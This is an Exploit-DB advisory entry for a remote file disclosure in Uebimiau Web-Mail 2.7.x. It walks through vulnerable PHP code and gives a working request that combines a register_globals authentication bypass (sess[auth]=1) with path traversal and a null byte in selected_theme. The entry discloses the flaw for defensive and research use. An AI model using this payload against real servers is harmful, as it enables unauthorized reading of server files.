Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure

EDB-ID:

4846

CVE:

2008-0210 2008-0140

EDB Verified:

Author:

Eugene Minaev

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-01-06

Vulnerable App: 
----[ Uebimiau Web-Mail Remote File Reader ... ITDefence.ru Antichat.ru ]

							Uebimiau Web-Mail Remote File Reader
							Eugene Minaev underwater@itdefence.ru
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
		 
		
		At first i decided to look login script . Each script includes this code
		
		<?php
		if(strlen($f_pass) > 0) {

		..elseif (
		($sess["auth"] && intval((time()-$start)/60) < $idle_timeout)) {

		$UM->mail_user   = $f_user    = $sess["user"];
		$UM->mail_pass   = $f_pass    = $sess["pass"];
		$UM->mail_server = $f_server  = $sess["server"];
		$UM->mail_email  = $f_email   = $sess["email"];

		} else {
		Header("Location: ./index.php?tid=$tid&lid=$lid\r\n"); 
		exit; 
		} 
		?>
		
		So , if register_globals on , we can make a request like script.php?f_pass=+toxa+&sess[auth]=1 
		to make script think that we are authorized user . Then i looked each script to find something 
		interest.
		
		<?php
		define("SMARTY_DIR","./smarty/");
		require_once(SMARTY_DIR."Smarty.class.php");
		$smarty = new Smarty;
		$smarty->compile_dir = $temporary_directory;
		$smarty->security=true;
		$smarty->secure_dir=array("./");
		$smarty->assign("umLanguageFile",$selected_language.".txt");  
		?>
		
		Looks great  :)  But selected_language was already defined . But there was a similar code with EXTRACT.
		So , we can read local files on server !
		
		<?php
		if($phpver >= 4.1) {
		extract($_GET);
		}

		$smarty->assign("umSid",$sid);
		$smarty->assign("umLid",$lid);
		$smarty->assign("umTid",$tid);

		$smarty->assign("umErrorCode",$err);

		$smarty->display("$selected_theme/error.htm");
		?>
		
		http://test1.ru/uebimiau/error.php?f_pass=blackybr&sess[auth]=1&selected_theme=../ksuri.php%00
		
		
		

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-06]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services